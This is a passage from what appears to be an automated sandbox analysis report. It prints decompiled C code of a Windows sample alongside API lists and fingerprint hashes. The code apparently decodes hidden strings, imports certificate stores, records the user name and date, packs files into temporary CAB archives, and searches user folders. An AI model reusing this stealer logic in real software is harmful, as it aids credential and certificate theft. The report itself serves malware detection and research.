				if(_t31 != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00403E39() != 0) {
					GetSystemTime( &_v760);
					E0040F369(0x80,  &_v600);
					_t74 =  &_v744;
					E0040F369(0x81, _t74);
					E00409F84( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E004111A5( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E0040D77B(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E00410454(_t79 + 0x48 + E00411098( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E004112C2(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E0040D77B(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E004112B2( &_v784);
							}
						}
					}
				}
				return _v776;
			}



























            0x0040a1ad
            0x0040a1b3
            0x0040a1bc
            0x0040a1c4
            0x0040a1cb
            0x0040a1d1
            0x0040a1d7
            0x0040a217
            0x0040a229
            0x0040a22e
            0x0040a237
            0x0040a243
            0x0040a24d
            0x0040a253
            0x0040a259
            0x0040a25c
            0x0040a264
            0x0040a26c
            0x0040a26f
            0x0040a274
            0x0040a279
            0x0040a27e
            0x0040a296
            0x0040a29b
            0x0040a2be
            0x0040a2c9
            0x0040a2d2
            0x0040a2e4
            0x0040a2e9
            0x0040a2e9
            0x0040a2d2
            0x0040a29b
            0x0040a27e
            0x0040a2f8

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
            • PFXImportCertStore.CRYPT32(?,?,?), ref: 0040A1CB
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • GetSystemTime.KERNEL32(?), ref: 0040A217
              • Part of subcall function 00409F84: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040A0E3), ref: 00409F99
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ObjectSingleWait$CertImportNameStoreSystemTimeUser
            • String ID: .txt
            • API String ID: 203043692-2195685702
            • Opcode ID: 77dedcb36bbc64d4f4f0c867b27b11ce3b841cc37004373050434c2adf8f31e5
            • Instruction ID: 672891c75741f4f1613b93bd345e85564aaa01e106414be4509369940d6857e0
            • Opcode Fuzzy Hash: 77dedcb36bbc64d4f4f0c867b27b11ce3b841cc37004373050434c2adf8f31e5
            • Instruction Fuzzy Hash: B5319F31100344AADB20EF65C941BAB77A8AF88304F00457FBE84E62D1DB79D998C75A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00414033 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E00414033(intOrPtr _a4) {
				void* _t26;
				intOrPtr _t28;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_t34 = 0;
				if(E00413F54() != 0) {
					_t36 = HeapAlloc( *0x41bc68, 8, 0x954);
					if(_t36 == 0) {
						L7:
						E00414012();
					} else {
						_t2 = _t36 + 0x53e; // 0x53e
						if(E00415D45(0, _t2, _a4) == 0) {
							L6:
							E00410418(_t36);
							goto L7;
						} else {
							_t3 = _t36 + 0x746; // 0x746
							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t22 > 0x00000000) == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t36 + 0x14)) = 0x7fffffff;
								_t7 = _t36 + 0x10; // 0x10
								 *_t7 = 0x7fffffff;
								 *((intOrPtr*)(_t36 + 0x24)) = 1;
								 *((intOrPtr*)(_t36 + 0x28)) = 1;
								_t10 = _t36 + 0x132; // 0x132
								E00410454(_t10, "cabinet.dll", 0xc);
								_t11 = _t36 + 0x232; // 0x232
								_t26 = E00410454(_t11, "?O", 2);
								_t12 = _t36 + 4; // 0x4
								_t28 =  *0x41bc60(_t12, E00413EBF, E00413B46, E00413B59, E00413CE5, E00413D1A, E00413D52, E00413D9A, E00413DC3, E00413E0F, E00413E47, _t26, _t36);
								 *_t36 = _t28;
								if(_t28 == 0) {
									goto L6;
								} else {
									_t34 = _t36;
								}
							}
						}
					}
				}
				return _t34;
			}







            0x00414034
            0x0041403d
            0x00414057
            0x0041405b
            0x00414127
            0x00414127
            0x00414061
            0x00414065
            0x00414075
            0x00414121
            0x00414122
            0x00000000
            0x0041407b
            0x0041407b
            0x00414094
            0x00000000
            0x0041409a
            0x0041409f
            0x004140a2
            0x004140a5
            0x004140ac
            0x004140af
            0x004140b7
            0x004140be
            0x004140ca
            0x004140d1
            0x00414105
            0x0041410e
            0x00414117
            0x0041411b
            0x00000000
            0x0041411d
            0x0041411d
            0x0041411d
            0x0041411b
            0x00414094
            0x00414075
            0x0041412c
            0x00414130

            APIs
              • Part of subcall function 00413F54: LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041403B,?,0041425F,?,?,00000000,?,?,?), ref: 00413F68
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00413F88
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(FCIAddFile), ref: 00413F9A
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00413FAC
              • Part of subcall function 00413F54: GetProcAddress.KERNEL32(FCIDestroy), ref: 00413FBE
              • Part of subcall function 00413F54: HeapCreate.KERNEL32(00000000,00080000,00000000,0041425F,?,?,00000000,?,?,?), ref: 00413FE9
              • Part of subcall function 00413F54: FreeLibrary.KERNEL32(0041425F,?,?,00000000,?,?,?), ref: 00413FFE
            • HeapAlloc.KERNEL32(00000008,00000954,?,?,0041425F,?,?,00000000,?,?,?), ref: 00414051
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • GetTempPathW.KERNEL32(00000103,00000746,0000053E,?,?,0041425F,?,?,00000000,?,?,?), ref: 00414087
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$HeapLibraryPath$AllocCombineCreateFreeLoadTemp
            • String ID: cabinet.dll
            • API String ID: 3425133823-741892446
            • Opcode ID: c379340c9199c6a65476d24d26ffd0dfbce50936c7474d0220a03d5ed2e205b0
            • Instruction ID: a4ac8e28487a97aeeac00623159ef3462fa1fb9ae2c9623b3f729f3daaf109d5
            • Opcode Fuzzy Hash: c379340c9199c6a65476d24d26ffd0dfbce50936c7474d0220a03d5ed2e205b0
            • Instruction Fuzzy Hash: 6B210571380700BBD7209F219C4AFD77798AB88B06F20442FB656A66D1DBBCD6C9875C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004149F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
            Download Yara Rule
            C-Code - Quality: 63%
            			E004149F0(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E00410454( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00410454( &_v284, _a12, 0x102);
					E0041195B( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E004107C1(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

















            0x00414a00
            0x00414a06
            0x00414a0b
            0x00414a0e
            0x00414a15
            0x00414a19
            0x00414a1b
            0x00414a1d
            0x00414a21
            0x00414a25
            0x00414a29
            0x00414a2b
            0x00414a2b
            0x00414a2d
            0x00414a2e
            0x00414a37
            0x00414a48
            0x00414a59
            0x00414a59
            0x00414a62
            0x00414a65
            0x00414a67
            0x00414a68
            0x00414a76
            0x00414a7b
            0x00000000
            0x00414a6a
            0x00414a6b
            0x00414a6d
            0x00414a72
            0x00414a7d
            0x00414a7d
            0x00414a82
            0x00414a87
            0x00414a87
            0x00414a6b
            0x00414a68
            0x00414a8d
            0x00414a91
            0x00414a9a

            APIs
            • StringFromGUID2.OLE32(00000000,0041A702,00000028,0040389F,?,00000010,?,00000000), ref: 00414A91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FromString
            • String ID: Global\$Local\
            • API String ID: 1694596556-639276846
            • Opcode ID: efbf727a9e3a9c53e6c25bf6df41ad7af4f6959fb8d7a51e40e01c6b647d84d4
            • Instruction ID: 33b5d4ce87c77fe6ef4b2d0465663e34297b108f7f0955cf64e03c164073db82
            • Opcode Fuzzy Hash: efbf727a9e3a9c53e6c25bf6df41ad7af4f6959fb8d7a51e40e01c6b647d84d4
            • Instruction Fuzzy Hash: 2F11383164010E56CB14DF748C46BEF3769EF80755F00842BE612E60C1DBB8D5C6CB98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040943D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E0040943D(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v56;
				char _v88;
				char _v612;
				void* __esi;
				void* _t18;
				char* _t23;
				void* _t25;
				signed int _t34;
				char* _t35;
				void* _t38;

				_t35 =  &_v88;
				_t18 = 0x6c;
				E0040F369(_t18, _t35);
				_v16 = _t35;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E004104CB( &_v12,  &_v12, 0, 8);
				_t34 = 0;
				do {
					_t23 =  &_v612;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t38 + _t34 * 4 - 0x18)), 0, 0, _t23);
					_t41 = _t23;
					if(_t23 == 0) {
						_t33 =  &_v16;
						E00415BE8( &_v612,  &_v16, _t41, 1, 2, E004091AC,  &_v12, 0, 0, 0);
					}
					_t34 = _t34 + 1;
				} while (_t34 < 3);
				_t43 = _v8;
				if(_v8 > 0) {
					_t37 =  &_v56;
					_t25 = 0x6d;
					E0040F369(_t25,  &_v56);
					E0040D929(_t37, _v12, _t33, _t43, _t37);
				}
				return E00410418(_v12);
			}



















            0x0040944a
            0x0040944d
            0x0040944e
            0x00409457
            0x00409461
            0x00409468
            0x0040946f
            0x00409476
            0x0040947b
            0x0040947d
            0x0040947d
            0x0040948b
            0x00409491
            0x00409493
            0x004094a5
            0x004094ae
            0x004094ae
            0x004094b3
            0x004094b4
            0x004094b9
            0x004094bc
            0x004094c0
            0x004094c3
            0x004094c4
            0x004094cf
            0x004094cf
            0x004094df

            APIs
            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008), ref: 0040948B
              • Part of subcall function 00415BE8: FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
              • Part of subcall function 00415BE8: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
              • Part of subcall function 00415BE8: PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
              • Part of subcall function 00415BE8: Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
              • Part of subcall function 00415BE8: FindNextFileW.KERNEL32(?,?), ref: 00415D24
              • Part of subcall function 00415BE8: FindClose.KERNEL32(?), ref: 00415D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
            • String ID: #$&
            • API String ID: 1211921070-3870246384
            • Opcode ID: 2ba0d3462220a7a7dee2fbe7eecd2778a736630a2e98fcd42b198f65ee9cf9c8
            • Instruction ID: 4d00b4b4c2625f4448f9b85930361dfc247760f611046204eaa765bc3a8ad894
            • Opcode Fuzzy Hash: 2ba0d3462220a7a7dee2fbe7eecd2778a736630a2e98fcd42b198f65ee9cf9c8
            • Instruction Fuzzy Hash: 6A118C71E01228BADB20EAA2DC49FDF7F78EF41754F00406AB505B6181D3795A89CBE4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408AFE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E00408AFE(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v60;
				char _v580;
				void* __esi;
				void* _t18;
				char* _t23;
				void* _t25;
				signed int _t34;
				char* _t35;
				void* _t38;

				_t35 =  &_v60;
				_t18 = 0x58;
				E0040F369(_t18, _t35);
				_v16 = _t35;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E004104CB( &_v12,  &_v12, 0, 8);
				_t34 = 0;
				do {
					_t23 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t38 + _t34 * 4 - 0x18)), 0, 0, _t23);
					_t41 = _t23;
					if(_t23 == 0) {
						_t33 =  &_v16;
						E00415BE8( &_v580,  &_v16, _t41, 1, 2, E00408853,  &_v12, 0, 0, 0);
					}
					_t34 = _t34 + 1;
				} while (_t34 < 3);
				_t43 = _v8;
				if(_v8 > 0) {
					_t37 =  &_v36;
					_t25 = 0x59;
					E0040F369(_t25,  &_v36);
					E0040D929(_t37, _v12, _t33, _t43, _t37);
				}
				return E00410418(_v12);
			}



















            0x00408b0b
            0x00408b0e
            0x00408b0f
            0x00408b18
            0x00408b22
            0x00408b29
            0x00408b30
            0x00408b37
            0x00408b3c
            0x00408b3e
            0x00408b3e
            0x00408b4c
            0x00408b52
            0x00408b54
            0x00408b66
            0x00408b6f
            0x00408b6f
            0x00408b74
            0x00408b75
            0x00408b7a
            0x00408b7d
            0x00408b81
            0x00408b84
            0x00408b85
            0x00408b90
            0x00408b90
            0x00408ba0

            APIs
            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008), ref: 00408B4C
              • Part of subcall function 00415BE8: FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
              • Part of subcall function 00415BE8: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
              • Part of subcall function 00415BE8: PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
              • Part of subcall function 00415BE8: Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
              • Part of subcall function 00415BE8: FindNextFileW.KERNEL32(?,?), ref: 00415D24
              • Part of subcall function 00415BE8: FindClose.KERNEL32(?), ref: 00415D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
            • String ID: #$&
            • API String ID: 1211921070-3870246384
            • Opcode ID: 0590e204195eb293cceff165757324a238d53069dc3fd10d3df4ee4b71751789
            • Instruction ID: 34c4962d11e19cafc2c6bfe13892630ad9b3e887822c94b2e4d052b4867e2afd
            • Opcode Fuzzy Hash: 0590e204195eb293cceff165757324a238d53069dc3fd10d3df4ee4b71751789
            • Instruction Fuzzy Hash: 72115171E01228BADB20AAA2DC49FDF7F78EF45754F00406AF644B7180D7786689CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004041CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E004041CD(void* __eflags) {
				char _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t15;
				CHAR* _t25;
				intOrPtr* _t26;
				WCHAR* _t28;
				struct HINSTANCE__* _t29;

				_t28 =  &_v44;
				E0040F369(0xb0, _t28);
				_t29 = GetModuleHandleW(_t28);
				if(_t29 != 0) {
					_t25 =  &_v20;
					E0040F333(0xb1, _t25);
					_t26 = GetProcAddress(_t29, _t25);
					if(_t26 == 0) {
						L4:
						_t15 = 0;
						L6:
						return _t15;
					}
					_t30 =  &_v92;
					E0040F369(0xa9,  &_v92);
					_push(0x1e6);
					_push("0xE35E00DF");
					if(E00411220( &_v8, _t30, 0x2000800) > 0) {
						 *_t26(0, _v8, "#", 0x10040);
						E00410418(_v8);
						_t15 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}














            0x004041d4
            0x004041dc
            0x004041ea
            0x004041ee
            0x004041f5
            0x004041fd
            0x0040420c
            0x00404210
            0x00404241
            0x00404241
            0x00404260
            0x00000000
            0x00404260
            0x00404212
            0x0040421a
            0x0040421f
            0x00404224
            0x0040423f
            0x00404254
            0x00404259
            0x0040425e
            0x00000000
            0x0040425e
            0x00000000
            0x0040423f
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(?), ref: 004041E4
            • GetProcAddress.KERNEL32(00000000,?), ref: 00404206
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: 0xE35E00DF
            • API String ID: 1646373207-599444087
            • Opcode ID: 295d01dee4f56c742eabeb589fed522242a170563ee6c9ad88657b0826af9943
            • Instruction ID: 214ceab3a2ce7850f8b748d36facc339d42c2989061227f6b29c59e2aaf7a6f7
            • Opcode Fuzzy Hash: 295d01dee4f56c742eabeb589fed522242a170563ee6c9ad88657b0826af9943
            • Instruction Fuzzy Hash: F001F17AB4031477DB2066B98C06BDF37689B84B50F000076FE00F72C1C678994696A9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403ED1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00403ED1(void* __ecx, WCHAR* __edi, signed int _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E00403E7C(__ecx,  &_v596);
				_t12 = _a4;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x41a2f0;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E00410628(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E00415D45(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}














            0x00403ed1
            0x00403edd
            0x00403ee8
            0x00403ef0
            0x00403ef3
            0x00403f13
            0x00403f13
            0x00000000
            0x00403ef5
            0x00403ef5
            0x00403ef6
            0x00403f0b
            0x00403f19
            0x00403f19
            0x00000000
            0x00403ef8
            0x00403ef8
            0x00403ef9
            0x00000000
            0x00403efb
            0x00403efb
            0x00403efc
            0x00403efe
            0x00403f03
            0x00403f1e
            0x00403f22
            0x00403f28
            0x00403f2f
            0x00403f35
            0x00403f3c
            0x00403f54
            0x00403f54
            0x00403f56
            0x00403f3e
            0x00403f42
            0x00403f4a
            0x00403f52
            0x00000000
            0x00000000
            0x00403f52
            0x00403f42
            0x00403f3c
            0x00403f2f
            0x00403efc
            0x00403ef9
            0x00403ef6
            0x00403f5c

            APIs
            • PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ExtensionPathRename
            • String ID: .dat$SOFTWARE\Microsoft
            • API String ID: 3337224433-47915998
            • Opcode ID: 75e190ddd1b3f717aeeb4023e13b22f82dca6b05ea67229a07a45ceb80d7a890
            • Instruction ID: 290486f5f4943682b8afa71fad261a398db649d8f508f66508e8a98a3c8afc9b
            • Opcode Fuzzy Hash: 75e190ddd1b3f717aeeb4023e13b22f82dca6b05ea67229a07a45ceb80d7a890
            • Instruction Fuzzy Hash: F7019234A1020795DB24AF69AC41BABBB7C9F50346F404077AA09F62C1D77CDF84C65E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004158F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E004158F8(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E00411812());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E004111A5(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E00415D45(_t19, _a8,  &_v524) == 0 || E004156EB(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}









            0x0041591b
            0x00415975
            0x00000000
            0x00415975
            0x0041591d
            0x0041591f
            0x0041591f
            0x00415927
            0x00415928
            0x00415937
            0x0041593d
            0x00415942
            0x00415948
            0x00000000
            0x00000000
            0x0041595d
            0x0041596f
            0x00415973
            0x00000000
            0x00000000
            0x00000000
            0x0041597d
            0x00000000
            0x0041597d
            0x0041595d
            0x00000000

            APIs
            • GetTempPathW.KERNEL32(000000F6,?), ref: 0041590F
              • Part of subcall function 00411812: GetTickCount.KERNEL32 ref: 00411812
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
              • Part of subcall function 004156EB: CreateFileW.KERNEL32(00414B12,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415705
              • Part of subcall function 004156EB: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415728
              • Part of subcall function 004156EB: CloseHandle.KERNEL32(00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415735
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
            • String ID: %s%08x.%s$tmp
            • API String ID: 3395140874-234517578
            • Opcode ID: 8b3a8e8ef4d45cde3121f8d419920383e11139a39ef9d6d9707cb50fed25fc97
            • Instruction ID: 36163f725cec66851bbd01b2d42d07bc3692d2c84e16816cf316ffba1f607d75
            • Opcode Fuzzy Hash: 8b3a8e8ef4d45cde3121f8d419920383e11139a39ef9d6d9707cb50fed25fc97
            • Instruction Fuzzy Hash: 5B014EB2200618F6EF203A149C05BEF7719D781734F104173FE24B61E1C2799DC69A5D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00413E47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00413E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				intOrPtr _t24;
				int _t26;

				_t26 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E004158D7( &_v524) != 0) {
					_t24 = _a4;
					E00411075(PathFindFileNameW( &_v524), _a8 + 0xfffffffd);
					E00410454(_t24, "?T", 2);
					 *((char*)(_t24 + 2)) = 0x5c;
					_t26 = 1;
				}
				return _t26;
			}






            0x00413e5b
            0x00413e71
            0x00413e87
            0x00413ea0
            0x00413ead
            0x00413eb4
            0x00413eb8
            0x00413eb9
            0x00413ebe

            APIs
            • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00413E69
              • Part of subcall function 004158D7: SetFileAttributesW.KERNEL32(00000080,00000080,0040A6AE,?), ref: 004158E0
              • Part of subcall function 004158D7: DeleteFileW.KERNEL32(?), ref: 004158EA
            • PathFindFileNameW.SHLWAPI(?,?,?,?), ref: 00413E98
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Name$AttributesDeleteFindPathTemp
            • String ID: cab
            • API String ID: 394148526-1787492089
            • Opcode ID: 34ab339e8feb188d6e190403a8150a3f8e476c5a09618b0ff8741c27cdbe8d74
            • Instruction ID: 95a472924949ede86cea5556a6d624c01ecdf4eb58aabcd4d22f8ce08fb6d478
            • Opcode Fuzzy Hash: 34ab339e8feb188d6e190403a8150a3f8e476c5a09618b0ff8741c27cdbe8d74
            • Instruction Fuzzy Hash: 5E018B3260031467DB109B65CC49FCBB7AC9F44755F004266B955F3191DA78EA4486D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040503F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E0040503F(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E00413971(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00411220( &_a4,  &M00403140, _a16) > 0) {
								E00411D38(_t27, _a4);
								E00410418(_a4);
							}
						}
						E00410418(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}






            0x00405049
            0x0040504e
            0x00405059
            0x0040505d
